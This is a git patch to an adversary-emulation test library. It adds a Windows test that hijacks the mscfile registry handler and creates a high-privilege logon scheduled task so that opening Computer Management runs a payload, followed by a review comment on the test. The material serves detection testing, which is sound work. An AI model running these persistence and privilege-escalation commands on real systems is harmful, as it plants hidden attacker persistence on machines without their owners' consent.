From 4034c339d5a8dca66832ea2179ab162c0717b789 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Tue, 24 Sep 2024 09:21:20 -0600
Subject: [PATCH] CompMgmt.msc (#2937)

msc to shell

Co-authored-by: Carrie Roberts
---
 atomics/T1053.005/T1053.005.yaml | 31 ++++++++++++++++++++++++++++++-
 1 file changed, 30 insertions(+), 1 deletion(-)

diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml
index 027f912c18..b550c95c24 100644
--- a/atomics/T1053.005/T1053.005.yaml
+++ b/atomics/T1053.005/T1053.005.yaml
@@ -281,4 +281,33 @@ atomic_tests:
 "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
 cleanup_command: |
 "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
- "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul
\ No newline at end of file
+ "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul
+
+- name: Scheduled Task Persistence via CompMgmt.msc
+ auto_generated_guid: 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2
+ description: |
+ Adds persistence by abusing `compmgmt.msc` via a scheduled task.
+ When the Computer Management console is opened, it will run a malicious payload (in this case, `calc.exe`).
+ This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes.
+ supported_platforms:
+ - windows
+ input_arguments:
+ task_name:
+ description: Name of the newly-created scheduled task
+ type: string
+ default: CompMgmtBypass
+ payload:
+ description: Command you want the task to execute
+ type: string
+ default: calc.exe
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
+ schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
+ ECHO Let's open the Computer Management console now...
+ compmgmt.msc
+ cleanup_command: |
+ reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f
+ schtasks /Delete /TN "#{task_name}" /F
\ No newline at end of file
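Review bot: The `payload` input is described as `Command you want the task to execute`, but the `reg add` line hard-codes the prefix `c:\windows\System32\` in front of it, so only a bare executable name that lives under System32 works and a full path or a command with arguments yields a broken handler value; either reword it to `description: Name of an executable under C:\Windows\System32 that the hijacked mscfile handler launches` or drop the prefix and use `/d "#{payload}"` with `default: c:\windows\System32\calc.exe`. The cleanup deletes only the `command` subkey, which leaves the now-empty `HKCU\Software\Classes\mscfile\shell\open` parent keys behind as a lingering artifact after the test; a user-scoped `mscfile` key is typically not present on a clean profile, so `reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile" /f` would return the hive to its prior state, though that assumption should be confirmed before changing it. The description also speaks only of "registry modifications"; naming the exact value written (the default value of `HKCU\Software\Classes\mscfile\shell\open\command`) would let detection engineers map this atomic to a rule without reading the command block.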